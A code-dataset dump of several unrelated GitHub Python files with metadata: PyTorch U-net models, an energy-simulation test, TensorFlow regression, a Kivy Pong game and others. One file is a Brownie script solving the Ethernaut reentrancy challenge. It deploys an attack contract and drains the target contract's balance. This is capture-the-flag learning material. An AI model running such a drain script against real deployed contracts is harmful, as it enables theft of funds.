self.unpool = F.max_unpool2d
self.BN_up = nn.BatchNorm2d(self.nf_input)
if len(self.hp.nf_table) > 1:
self.unet = self.__class__(self.hp)
else:
self.unet = None
self.reduce = nn.Conv2d(2*self.nf_input, self.nf_input, 1, 1)
self.BN_out = nn.BatchNorm2d(self.nf_input)
def forward(self, x, mask=None):
y = self.dropout(x)
y, new_mask = self.conv_down(y, mask)
y = self.BN_down(F.elu(y, inplace=True))
if self.unet is not None:
if self.hp.pool:
y_size = y.size()
y, indices = self.pool(y, 2, stride=2, return_indices=True)
if new_mask is not None:
new_mask_size = new_mask.size()
new_mask, mask_indices = self.pool(new_mask, 2, stride=2, return_indices=True)
y = self.unet(y, new_mask)
if self.hp.pool:
y = self.unpool(y, indices, 2, stride=2, output_size=list(y_size)) # list(y_size) is to fix a bug in torch 1.0.1; not need in 1.4.0
if new_mask is not None:
new_mask = self.unpool(new_mask, mask_indices, 2, stride=2, output_size=list(new_mask_size))
y = self.dropout(y)
y, _ = self.conv_up(y, new_mask)
y = self.BN_up(F.elu(y, inplace=True))
# y = torch.cat((x, y), 1)
# y = self.reduce(y)
y = self.BN_out(F.elu(y, inplace=True))
return y
class Unet1d(Unet):
"""
1D U-net.
Params:
hp (HyperparametersUnet): the U-net hyperparameters.
"""
def __init__(self, hp: HyperparametersUnet):
super().__init__(hp, nn.Conv1d, nn.ConvTranspose1d, nn.BatchNorm1d, F.avg_pool1d)
class Unet2d(Unet):
"""
2D U-net.
Params:
hp (HyperparametersUnet): the U-net hyperparameters.
"""
def __init__(self, hp: HyperparametersUnet):
super().__init__(hp, nn.Conv2d, nn.ConvTranspose2d, nn.BatchNorm2d, F.avg_pool2d)
class HyperparametersCatStack(Hyperparameters):
"""
Hyperparameters for CatStack models. Extends the base class Hyperparameters.
Usage: a 3 layers U-net is specified with the following hyperparameters
HyperparametersUnet(
N_layers=2,
kernel=7,
padding=3,
stride=1
in_channels=2, # params from base class
hidden_channels=2, # params from base class
out_channels=3, # params from base class
dropout_rate=0.1 # params from base class
)
Params and Attributes:
N_layers (int): the number of layers.
kernel (int): kernel of the convoclution step.
padding (int): padding added to each convolution.
stride (int): stride of the convolution.
"""
def __init__(self, N_layers, kernel, padding, stride, **kwargs):
super().__init__(**kwargs)
self.N_layers = N_layers
self.kernel = kernel
self.padding = padding
self.stride = stride
class ConvBlock(nn.Module):
"""
Base class of a convolution block including a batchnomr of ReLU.
This class is not meant to be instantiated.
Params:
hp (Hyperparameters):
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the adapter and compression layers.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d)
"""
def __init__(self, hp: Hyperparameters, conv:ClassVar, bn: ClassVar):
self.hp = hp
super().__init__()
self.dropout = nn.Dropout(self.hp.dropout_rate)
self.conv = conv(self.hp.hidden_channels, self.hp.hidden_channels, self.hp.kernel, self.hp.stride, self.hp.padding)
self.BN = bn(self.hp.hidden_channels)
def forward(self, x):
x = self.dropout(x)
x = self.conv(x)
x = self.BN(F.elu(x, inplace=True))
return x
class ConvBlock2dPC(nn.Module):
"""
Base class of a partial convolution block including a batchnomr of ReLU.
Params:
hp (Hyperparameters):
"""
def __init__(self, hp: Hyperparameters):
self.hp = hp
super().__init__()
self.dropout = nn.Dropout(self.hp.dropout_rate)
self.conv = PartiaLConv2d(self.hp.hidden_channels, self.hp.hidden_channels, self.hp.kernel, self.hp.stride, self.hp.padding) #, multi_channel=True, return_mask=True)
self.BN = nn.BatchNorm2d(self.hp.hidden_channels)
def forward(self, x, mask=None):
x = self.dropout(x)
x, mask = self.conv(x, mask)
x = self.BN(F.elu(x, inplace=True))
assert x.dim() == 4
return x, mask
class CatStack2dPC(nn.Module):
"""
Base class for a CatStack model made of a concatenated stack of convolution blocks.
Params:
hp (HyperparametersCatStack)
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__()
self.hp = hp
self.conv_stack = nn.ModuleList()
for i in range(self.hp.N_layers):
self.conv_stack.append(ConvBlock2dPC(hp))
self.reduce = nn.Conv2d((1 + self.hp.N_layers) * self.hp.hidden_channels, self.hp.hidden_channels, 1, 1)
self.BN = nn.BatchNorm2d(self.hp.hidden_channels)
def forward(self, x, mask=None):
x_list = [x]
for i in range(self.hp.N_layers):
x, mask = self.conv_stack[i](x, mask)
x_list.append(x)
x = torch.cat(x_list, 1)
x = self.reduce(x)
y = self.BN(F.elu(x, inplace=True))
assert y.dim() == 4
return y
class CatStack(nn.Module):
"""
Base class for a CatStack model made of a concatenated stack of convolution blocks. This class is not meant to be instantiated.
Params:
hp (HyperparametersCatStack):
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the adapter and compression layers.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d)
conv_block (ClassVar): the class of convolution block to build the stack.
"""
def __init__(self, hp: HyperparametersCatStack, conv: ClassVar, bn: ClassVar, conv_block: ClassVar):
super().__init__()
self.hp = hp
self.conv_stack = nn.ModuleList()
for i in range(self.hp.N_layers):
self.conv_stack.append(conv_block(hp))
self.reduce = conv((1 + self.hp.N_layers) * self.hp.hidden_channels, self.hp.hidden_channels, 1, 1)
self.BN = bn(self.hp.hidden_channels)
def forward(self, x):
x_list = [x]
for i in range(self.hp.N_layers):
x = self.conv_stack[i](x)
x_list.append(x)
x = torch.cat(x_list, 1)
x = self.reduce(x)
y = self.BN(F.elu(x, inplace=True))
return y
class Autoencoder1d(nn.Module):
"""
An 1D autoencoder based on a Container1d with CatStack1d.
The Container1d layer is followed by a reduction layer that addpats the number of output channels
to be equal to the number of input channels.
Params:
hp (HyperParametersCatStack): hyperparameters of the internal CatStack1d model.
"""
def __init__(self, hp: Hyperparameters, model: ClassVar):
super(Autoencoder1d, self).__init__()
self.in_channels = hp.in_channels
self.hp = hp
self.embed = Container1d(hp=self.hp, model=model)
self.reduce = nn.Conv1d(self.embed.out_channels, self.in_channels, 1, 1)
def forward(self, x):
y = self.embed(x)
y = self.reduce(F.elu(y))
return y
class ConvBlock1d(ConvBlock):
"""
A 1D convolution block.
Params:
hp (HyperparametersUnet): the U-net hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv1d, nn.BatchNorm1d)
class CatStack1d(CatStack):
"""
A 1D stracked convolution CatStack model.
Params:
hp (HyperparametersUnet): hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv1d, nn.BatchNorm1d, ConvBlock1d)
class ConvBlock2d(ConvBlock):
"""
A 2D convolution block.
Params:
hp (HyperparametersUnet): hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv2d, nn.BatchNorm2d)
class CatStack2d(CatStack):
"""
A 2D stracked convolution CatStack model.
Params:
hp (HyperparametersUnet): hyperparameters.
"""
def __init__(self, hp: HyperparametersCatStack):
super().__init__(hp, nn.Conv2d, nn.BatchNorm2d, ConvBlock2d)
def self_test():
hpcs = HyperparametersCatStack(N_layers=2, kernel=7, padding=3, stride=1, in_channels=1, out_channels=3, hidden_channels=2, dropout_rate=0.1)
cs2d = CatStack2d(hpcs)
cb2d = ConvBlock2d(hpcs)
cs1d = CatStack1d(hpcs)
cb1d = ConvBlock1d(hpcs)
hpun = HyperparametersUnet(nf_table=[2,2,2], kernel_table=[3,3], stride_table=[1,1,1], pool=True, in_channels=1, hidden_channels=2, out_channels=3, dropout_rate=0.1)
un2d = Unet2d(hpun)
c1dcs = Container1d(hpcs, CatStack1d)
c2dcs = Container2d(hpcs, CatStack2d)
c2dcs_PC = Container2dPC(hpun)
c1dun = Container1d(hpun, Unet1d)
c2dun = Container2d(hpun, Unet2d)
cs1d(torch.ones(2, hpcs.hidden_channels, 100))
cs2d(torch.ones(2, hpcs.hidden_channels, 10, 10))
cb1d(torch.ones(2, hpcs.hidden_channels, 100))
cb2d(torch.ones(2, hpcs.hidden_channels, 10, 10))
c1dcs(torch.ones(2, hpcs.in_channels, 100))
c2dcs(torch.ones(2, hpcs.in_channels, 10, 10))
c1dun(torch.ones(2, hpcs.in_channels, 100))
c2dun(torch.ones(2, hpcs.in_channels, 10, 10))
c2dcs_PC(torch.ones(2, hpcs.in_channels, 10, 10), torch.randint(0, 2,(2, 1, 10, 10)).float())
print("It seems to work: all classes could be instantiated and input forwarded.")
def main():
self_test()
if __name__ == '__main__':
main() | source-data/ai | toolbox/models.py | models.py | py | 23,355 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.Conv2d",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "torch.ones_like",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"li... |
23467172721 | #!/usr/bin/python3
from brownie import Reentrance, Attack
from scripts.deploy import deploy
from scripts.helpful_scripts import get_account
from colorama import Fore
from web3 import Web3 as w3
# * colours
green = Fore.GREEN
red = Fore.RED
blue = Fore.BLUE
magenta = Fore.MAGENTA
reset = Fore.RESET
# * Rinkeby address : 0x402C04B14625dAcb8f8Db3e535b9B3E210C3dd79
AMOUNT = "0.001 ether"
def convert_fromWei(value):
return w3.fromWei(value, "ether")
def reentrance(contract_address=None, attacker=None):
if not contract_address:
reentrance_contract, owner = deploy()
contract_address = reentrance_contract.address
_, attacker = get_account()
else:
reentrance_contract = Reentrance.at(contract_address)
# print(contract_address)
print(
f"{green}Current Contract Balance -> {magenta}{convert_fromWei(reentrance_contract.balance())} ETH{reset}"
)
# exit(1)
# * deploy the malicious contract
atttack_contract = Attack.deploy(
reentrance_contract.address, AMOUNT, {"from": attacker}
)
reentrance_contract.donate(
atttack_contract.address, {"from": attacker, "amount": AMOUNT}
)
atttack_contract.attack({"from": attacker, "allow_revert": True})
print(f"{red}Attack Successful!!!{reset}")
print(
f"{green}Current Contract Balance -> {magenta}{convert_fromWei(reentrance_contract.balance())} ETH{reset}"
)
atttack_contract.destroy()
print(
f"{green}Balance of the attacker: {red}{convert_fromWei(attacker.balance())}{reset} ETH"
)
def main(contract_address=None):
if contract_address:
reentrance(contract_address, get_account())
else:
reentrance()
if __name__ == "__main__":
main()
| Aviksaikat/Blockchain-CTF-Solutions | ethernaut/Re-entrance_DONE/scripts/attack.py | attack.py | py | 1,759 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "colorama.Fore.GREEN",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "colorama.Fore.RED",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "colorama.... |
20838574752 | from cases import *
import pandas as pd
import scipy.io
import sys
def compare_cases():
coefs=scipy.io.loadmat("../data/timeseries.mat")
trend_coefs=pd.read_csv("../data/trends.csv")
season_coefs=pd.read_csv("../data/season.csv")
num_years=1
start_year=2020
num_simulations=100
seed=0
params=[coefs,trend_coefs,season_coefs,num_years,start_year,seed,"independent",0,0]
cases=[case0(*params[:-2]),case1(*params),case2(*params),case3_1(*params),case3_2(*params),case3_3(*params)]
for case in cases:
case.sendable_max=0
try:
case.platform_restriction=0
except:
pass
case.simulate_n_years(n=num_simulations)
assert np.all(np.abs(case.get_CO2()-cases[0].get_CO2())/1e9<1e-12)
compare_cases()
def simulate_5_steps_test(): #Test wether the simulation set up works as intended by more explicitely calculating the results than my for loops
def coefs_to_function(trend_coef,season_coef,period):
trendfunc=np.poly1d(trend_coef)
seasonfunc=np.poly1d(season_coef)
def seasonfunc_periodic(t):
return seasonfunc((t-1)%period)
return (lambda t:seasonfunc_periodic(t*period/52)+trendfunc(t*period/52))
coefs=scipy.io.loadmat("../data/timeseries.mat")
trend_coefs=pd.read_csv("../data/trends.csv")
season_coefs=pd.read_csv("../data/season.csv")
sigma_windsun=coefs["windsun_sigma"]
#print(sigma_windsun)
num_years=1
start_year=2020
num_simulations=100
seed=0
params=[coefs,trend_coefs,season_coefs,num_years,start_year,seed,0,0]
testcase=case0(*params[:-2])
testcase.simulate_n_years(n=1) #Simulate for one year
simulation_results=testcase.simulation_results[:,:10]/(24*7)
rng_wind=np.random.default_rng(0)
rng_load=np.random.default_rng(1)
rng_water=np.random.default_rng(2)
order=["wind NO","wind DE","load NO","load DE","water NO","solar DE"]
periods=[52,52,52,52,13,52]
functions=[]
for i in range(6):
trend=trend_coefs[order[i]]
season=season_coefs[order[i]]
functions.append(coefs_to_function(trend,season,period=periods[i]))
sigma_windsun=coefs["windsun_sigma"]
matrix_windsun=coefs["windsun_coefs"][0]
#print(matrix_windsun) #test correctness
#print(sigma_windsun) #test correctness
matrix_load_ar1=coefs["load_coefs"][0]
matrix_load_ar2=coefs["load_coefs"][1]
matrix_load_ar3=coefs["load_coefs"][2]
sigma_water=coefs["water_sigma"]
sigma_load=coefs["load_sigma"]
#print(matrix_load_ar1);print(matrix_load_ar2);print(matrix_load_ar3);print(sigma_load) #test correctness
#print(sigma_water)
random_numbers_windsun=np.zeros((10,3))
random_numbers_load=np.zeros((10,2))
for i in range(10):
random_numbers_windsun[i]=rng_wind.multivariate_normal(np.zeros(3),sigma_windsun)
random_numbers_load[i]=rng_load.multivariate_normal(np.zeros(2),sigma_load)
#print(random_numbers_windsun)
random_numbers_water=np.zeros(10)
sigmawater=np.sqrt(sigma_water[1,1]) #standard deviation for water
sigmaload=np.sqrt(sigma_water[0,0]) #Standard deviation for load
p=sigma_water[1,0]/(sigmawater*sigmaload) #rho in the covariance matrix
for i in range(10):
random_numbers_water[i]=rng_water.normal(sigmawater/sigmaload*p*random_numbers_load[i,0],np.sqrt((1-p**2))*sigmawater)
results_windsun=np.zeros((10,3))
results_loads=np.zeros((10,2))
results_water=np.zeros(10)
for i in range(10):
results_windsun[i]=matrix_windsun@results_windsun[i-1]+random_numbers_windsun[i]
results_loads[i]=matrix_load_ar1@results_loads[i-1]+matrix_load_ar2@results_loads[i-2]+matrix_load_ar3@results_loads[i-3]+random_numbers_load[i]
results=np.zeros((10,6))
for i in range(0,4):
results_water[i]=random_numbers_water[i]
for i in range(4,8):
mean=np.mean(results_water[0:4])
results_water[i]=random_numbers_water[i]+mean*1.189324
for i in range(8,10):
mean=np.mean(results_water[4:8])
mean_prev=np.mean(results_water[0:4])
results_water[i]=random_numbers_water[i]+mean*1.189324+mean_prev*(-0.484997)
for i in range(10):
time=i+(start_year-2017)*52
results[i,0]=np.exp(functions[0](time)+results_windsun[i,0]) #Norwegian wind
results[i,2]=np.exp(functions[2](time)+results_loads[i,0]) #Norwegian load
results[i,1]=np.exp(functions[1](time)+results_windsun[i,1]) #German wind
results[i,3]=np.exp(functions[3](time)+results_loads[i,1]) #German load
results[i,4]=np.exp(functions[4](time)+results_water[i]) #Water NO
results[i,5]=np.exp(functions[5](time)+results_windsun[i,2]) #German sun
assert np.all(np.abs(results.T-simulation_results)<0.01)
simulate_5_steps_test()
| schraderSimon/NorwayGermanyProject | code/testfunctions.py | testfunctions.py | py | 4,835 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "scipy.io.io.loadmat",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "scipy.io.io",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "scipy.io",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"lin... |
26345201031 | ## read params
## process
## return dataframe
import os
import yaml
import pandas as pd
import argparse
#read the params from the config path and it will return a dictionary(yaml file)
def read_params(config_path):
with open(config_path) as yaml_file:
config = yaml.safe_load(yaml_file)
return config
#This function will get the data
def get_data(config_path):
#read the params from configaration file from the configaration path
config = read_params(config_path) #here calling the above method read_params()
#print(config)
#
data_path = config["data_source"]["s3_source"]
df = pd.read_csv(data_path, sep=",", encoding='utf-8')
#print(df.head())
return df #here we are returning df and this df value will go and assign to a data in the below main method
if __name__=="__main__":
args = argparse.ArgumentParser()
args.add_argument("--config", default="params.yaml")
parsed_args = args.parse_args()
data = get_data(config_path=parsed_args.config) | SrinivasGuntupalli/simple_dvc_demo | src/get_data.py | get_data.py | py | 1,015 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "yaml.safe_load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 29,
"usage_type": "call"
}
] |
72457648034 | import torch
from mmdet.core.bbox import BaseBBoxCoder
from mmdet.core.bbox.builder import BBOX_CODERS
@BBOX_CODERS.register_module()
class CameraBBoxCoder(BaseBBoxCoder):
def __init__(self, code_size=8):
self.code_size = code_size
def encode(self, dst_boxes):
targets = torch.zeros([dst_boxes.shape[0], self.code_size]).to(dst_boxes.device)
targets[:, 3] = dst_boxes[:, 3].log()
targets[:, 4] = dst_boxes[:, 4].log()
targets[:, 5] = dst_boxes[:, 5].log()
targets[:, 6] = torch.sin(dst_boxes[:, 6])
targets[:, 7] = torch.cos(dst_boxes[:, 6])
targets[:, 0] = dst_boxes[:, 0]
targets[:, 1] = dst_boxes[:, 1] - 0.5 * dst_boxes[:, 4]
targets[:, 2] = dst_boxes[:, 2]
if self.code_size == 10:
targets[:, 8:10] = dst_boxes[:, 7:]
return targets
def decode(self, cls, rot, dim, center, vel):
"""Decode bboxes.
Args:
cls (torch.Tensor): Heatmap with the shape of [B, num_cls, num_proposals].
rot (torch.Tensor): Rotation with the shape of
[B, 2, num_proposals].
dim (torch.Tensor): Dim of the boxes with the shape of
[B, 3, num_proposals].
center (torch.Tensor): bev center of the boxes with the shape of
[B, 3, num_proposals]. (in feature map metric)
vel (torch.Tensor): Velocity with the shape of [B, 2, num_proposals].
Returns:
list[dict]: Decoded boxes.
"""
# class label
final_preds = cls.max(1, keepdims=False).indices
final_scores = cls.max(1, keepdims=False).values
dim[:, 0, :] = dim[:, 0, :].exp()
dim[:, 1, :] = dim[:, 1, :].exp()
dim[:, 2, :] = dim[:, 2, :].exp()
# dim = torch.exp(dim)
rots, rotc = rot[:, 0:1, :], rot[:, 1:2, :]
rot = torch.atan2(rots, rotc)
center = center.clone()
center[:, 1, :] = center[:, 1, :] + 0.5 * dim[:, 1, :]
if vel is None:
final_box_preds = torch.cat([center, dim, rot], dim=1).permute(0, 2, 1)
else:
final_box_preds = torch.cat([center, dim, rot, vel], dim=1).permute(0, 2, 1)
predictions_dicts = []
for i in range(cls.shape[0]):
boxes3d = final_box_preds[i]
scores = final_scores[i]
labels = final_preds[i]
predictions_dict = {
'bboxes': boxes3d,
'scores': scores,
'labels': labels
}
predictions_dicts.append(predictions_dict)
return predictions_dicts
@staticmethod
def decode_yaw(bbox, centers2d, cam2img):
bbox[:, 6] = torch.atan2(centers2d[:, 0] - cam2img[0, 2], cam2img[0, 0]) + bbox[:, 6]
return bbox
| yichen928/SparseFusion | mmdet3d/core/bbox/coders/camera_bbox_coder.py | camera_bbox_coder.py | py | 2,909 | python | en | code | 116 | github-code | 1 | [
{
"api_name": "mmdet.core.bbox.BaseBBoxCoder",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "torch.zeros",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.sin",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "torch.cos",
"l... |
11939597532 | from __future__ import absolute_import, division, print_function
import tensorflow as tf
from tensorflow import keras
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
print('tensorflow version:', tf.__version__)
# 1) get data
boston_housing = keras.datasets.boston_housing
(train_data, train_labels), (test_data, test_labels) = boston_housing.load_data(path='boston_housing.npz')
print('Training set:{}'.format(train_data.shape)) # 404 examples, 13 features
print('Testing set:{}'.format(test_data.shape)) # 102 examples, 13 features
print(train_data[0])
column_names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD',
'TAX', 'PTRATIO', 'B', 'LSTAT']
df = pd.DataFrame(train_data, columns=column_names)
print(df.head())
print(train_labels[0:10])
# 2) feature normalize
mean = train_data.mean(axis=0)
std = train_data.std(axis=0)
train_data = (train_data - mean) / std
test_data = (test_data - mean) / std
print(train_data[0])
# 3) create model
def build_model():
model = keras.Sequential([
keras.layers.Dense(64, activation=tf.nn.relu, input_shape=(train_data.shape[1],)),
keras.layers.Dense(64, activation=tf.nn.relu),
keras.layers.Dense(1)
])
optimizer = tf.train.RMSPropOptimizer(0.001)
model.compile(loss='mse', optimizer=optimizer, metrics=['mae'])
return model
model = build_model()
model.summary()
# 4) train the model
class PrintDot(keras.callbacks.Callback):
"""docstring for PrintDot"""
def on_epoch_end(self, epoch, logs):
if epoch % 100 == 0:
print('')
print('.', end='')
EPOCHS = 500
history = model.fit(train_data, train_labels, epochs=EPOCHS, validation_split=0.2, verbose=0, callbacks=[PrintDot()])
def plot_history(history):
plt.figure()
plt.xlabel('Epoch')
plt.ylabel('Mean Abs Error [1000$]')
plt.plot(history.epoch, np.array(history.history['mean_absolute_error']), label='Train Loss')
plt.plot(history.epoch, np.array(history.history['val_mean_absolute_error']), label='Val Loss')
plt.legend()
plt.ylim([0, 5])
# plt.show()
# plt.subplot(1,3,1)
plot_history(history)
# stop train early when loss descend hardly
model_early = build_model()
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=20)
history_early = model_early.fit(train_data, train_labels, epochs=EPOCHS, validation_split=0.2, verbose=0, callbacks=[early_stop, PrintDot()])
# plt.subplot(1,3,2)
plot_history(history_early)
# 5) evaluate test data
[loss, mae] = model.evaluate(test_data, test_labels, verbose=0)
print('Testing set Mean Abs Error:${:7.2f}'.format(mae*1000))
# 6) predict
test_prediction = model.predict(test_data).flatten()
# plt.subplot(1,3,3)
plt.figure()
plt.scatter(test_labels, test_prediction)
plt.xlabel('True Values [1000$]')
plt.ylabel('Prediction [1000$]')
plt.axis('equal')
plt.xlim(plt.xlim())
plt.ylim(plt.ylim())
_ = plt.plot([-100, 100], [-100, 100])
error = test_prediction - test_labels
plt.figure()
plt.hist(error, bins=50)
plt.xlabel('Prediction Error [1000$]')
plt.ylabel('Count')
plt.show()
| halazila/pythonLearn | tfLearn/houseprice_reg.py | houseprice_reg.py | py | 3,037 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "tensorflow.__version__",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.datasets",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras",
"line_number": 12,
"usage_type": "name"
},
{
"api_na... |
30020287097 | import os
from random import randint
from functools import partial
from datetime import datetime
from config.log_config import LogConfig
from config.pong_enum import PathEnum, ButtonNamesEnum
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, StringProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.core.audio import SoundLoader
log_config = LogConfig()
logger = log_config.configurate_log()
class PongBall(Widget):
balls_list = os.listdir(PathEnum.BALLS_PATH_ENUM)
ball_image = StringProperty(PathEnum.BALLS_PATH_ENUM + '/' + balls_list[0])
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongPaddle(Widget):
score = NumericProperty(0)
def __init__(self, **kwargs):
super(PongPaddle, self).__init__(**kwargs)
self.bounce_sound = SoundLoader.load(PathEnum.BOUNCE_SOUND_PATH_ENUM)
def bounce_ball(self, ball):
if self.collide_widget(ball):
self.bounce_sound.play()
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 2)
bounced = Vector(-1 * vx, vy)
vel = bounced * 1.15
ball.velocity = vel.x, vel.y + offset
logger.debug('Game: Ball bounced')
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
is_running = False
vs_ai = True
result = StringProperty('')
start_time = NumericProperty(0)
elapsed_time = NumericProperty(0)
backgrounds_list = os.listdir(PathEnum.BACKGROUNDS_PATH_ENUM)
background_image = StringProperty(PathEnum.BACKGROUNDS_PATH_ENUM + '/' + backgrounds_list[0])
def __init__(self, **kwargs):
super(PongGame, self).__init__(**kwargs)
self.start_button = None
self.mode_button = None
self.background_image_button = None
self.ball_button = None
self.white_sound = SoundLoader.load(PathEnum.WHITE_SOUND_PATH_ENUM)
self.move_paddle_event = None # Event for moving paddles
def change_background(self, instance):
logger.debug('UI: Background changed')
for i in range(len(self.backgrounds_list)):
if PathEnum.BACKGROUNDS_PATH_ENUM + '/' + self.backgrounds_list[i] == self.background_image:
if i + 1 == len(self.backgrounds_list):
self.background_image = PathEnum.BACKGROUNDS_PATH_ENUM + '/' + self.backgrounds_list[0]
break
else:
self.background_image = PathEnum.BACKGROUNDS_PATH_ENUM + '/' + self.backgrounds_list[i + 1]
break
def change_ball(self, instance):
logger.debug('UI: Ball changed')
for i in range(len(self.ball.balls_list)):
if PathEnum.BALLS_PATH_ENUM + '/' + self.ball.balls_list[i] == self.ball.ball_image:
if i + 1 == len(self.ball.balls_list):
self.ball.ball_image = PathEnum.BALLS_PATH_ENUM + '/' + self.ball.balls_list[0]
break
else:
self.ball.ball_image = PathEnum.BALLS_PATH_ENUM + '/' + self.ball.balls_list[i + 1]
break
def serve_ball(self, vel=(8, 2)):
self.ball.center = self.center
angle = randint(10, 60) # угол 10 и 240 градусов
self.ball.velocity = Vector(vel[0], vel[1]).rotate(angle)
logger.debug('Game: Ball Start')
def update(self, dt):
if not self.is_running:
return
current_time = datetime.now().timestamp()
self.elapsed_time = current_time - self.start_time
self.ball.move()
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
if (self.ball.y < 0) or (self.ball.top > self.height):
self.ball.velocity_y *= -1
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel=(8, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel=(-8, 0))
if self.vs_ai:
self.move_ai_paddle()
self.check_results()
def check_results(self):
if self.player1.score == 5 or self.player2.score == 5:
self.is_running = False
Clock.unschedule(self.update)
self.show_results()
def on_touch_move(self, touch):
if self.vs_ai:
if touch.x < self.width / 3:
self.player1.center_y = touch.y
else:
if touch.x < self.width / 3:
self.player1.center_y = touch.y
elif touch.x > self.width - self.width / 3:
self.player2.center_y = touch.y
def show_results(self):
logger.debug('UI: Pop up created')
if self.player1.score > self.player2.score:
winner = "Red Wins!"
else:
winner = "Blue Wins!"
logger.debug(f'Game: {winner}')
score_message = "Red Score: {}\nBlue Score: {}\nElapsed Time: {:.2f} seconds".format(
self.player1.score, self.player2.score, self.elapsed_time)
winner_label = Label(text=winner, font_size='40sp')
score_label = Label(text=score_message)
# Создаем BoxLayout для размещения виджетов Label
layout = BoxLayout(orientation='vertical', padding=(0, 30))
layout.add_widget(winner_label)
layout.add_widget(score_label)
# Создаем Popup с новым контентом
message_box = Popup(title="Game Over", content=layout, size_hint=(None, None), size=(700, 700))
message_box.open()
self.return_to_main_menu()
def return_to_main_menu(self):
self.is_running = False
self.enable_menu()
self.reset_score()
Clock.unschedule(self.update)
self.ball.velocity = (0, 0)
self.ball.center = self.center
self.serve_ball() # Serve the ball for the next match
self.start_time = 0
self.elapsed_time = 0
logger.debug('Game: Returned to main menu')
def start_game(self, instance):
self.is_running = True
self.disable_menu()
self.reset_score()
self.serve_ball()
self.start_time = datetime.now().timestamp()
logger.debug('Game: Match started')
if self.vs_ai:
self.player2.center_y = self.center_y
Clock.unschedule(self.update) # Unscheduling previous updates
Clock.schedule_interval(self.update, 1.0 / 60) # Schedule the update again
# Start moving paddles
self.move_paddle_event = Clock.schedule_interval(partial(self.move_paddles), 1.0 / 60)
def reset_score(self):
self.player1.score = 0
self.player2.score = 0
def switch_mode(self, instance):
self.vs_ai = not self.vs_ai
instance.text = "AI Mode" if self.vs_ai else "2 Players Mode"
logger.debug('Game: Mode switched to AI Mode' if self.vs_ai else 'Game: Mode switched to 2 Players')
def move_paddles(self, dt):
if self.vs_ai:
self.move_ai_paddle()
def move_ai_paddle(self):
if self.ball.center_y > self.player2.center_y:
self.player2.center_y += min(4.5, self.ball.center_y - self.player2.center_y)
elif self.ball.center_y < self.player2.center_y:
self.player2.center_y -= min(4.5, self.player2.center_y - self.ball.center_y)
def disable_menu(self):
self.start_button.disabled = True
self.start_button.opacity = 0
self.mode_button.disabled = True
self.mode_button.opacity = 0
self.background_image_button.disabled = True
self.background_image_button.opacity = 0
self.ball_button.disabled = True
self.ball_button.opacity = 0
def enable_menu(self):
self.start_button.disabled = False
self.start_button.opacity = 1
self.mode_button.disabled = False
self.mode_button.opacity = 1
self.background_image_button.disabled = False
self.background_image_button.opacity = 1
self.ball_button.disabled = False
self.ball_button.opacity = 1
class PongApp(App):
def build(self):
game = PongGame()
layout = BoxLayout(orientation='vertical', spacing=20, padding=(30, 0, 0, 0))
game.start_button = Button(text=ButtonNamesEnum.START_BTN_ENUM, size_hint=(None, None), size=(290, 100))
game.start_button.bind(on_press=game.start_game)
layout.add_widget(game.start_button)
game.mode_button = Button(text=ButtonNamesEnum.GAME_MODE_BTN_ENUM, size_hint=(None, None),
size=(290, 100))
game.mode_button.bind(on_press=game.switch_mode)
layout.add_widget(game.mode_button)
game.background_image_button = Button(text=ButtonNamesEnum.CHANGE_TABLE_BTN_ENUM, size_hint=(None, None),
size=(290, 100))
game.background_image_button.bind(on_press=game.change_background)
layout.add_widget(game.background_image_button)
game.ball_button = Button(text=ButtonNamesEnum.CHANGE_BALL_BTN_ENUM, size_hint=(None, None),
size=(290, 100))
game.ball_button.bind(on_press=game.change_ball)
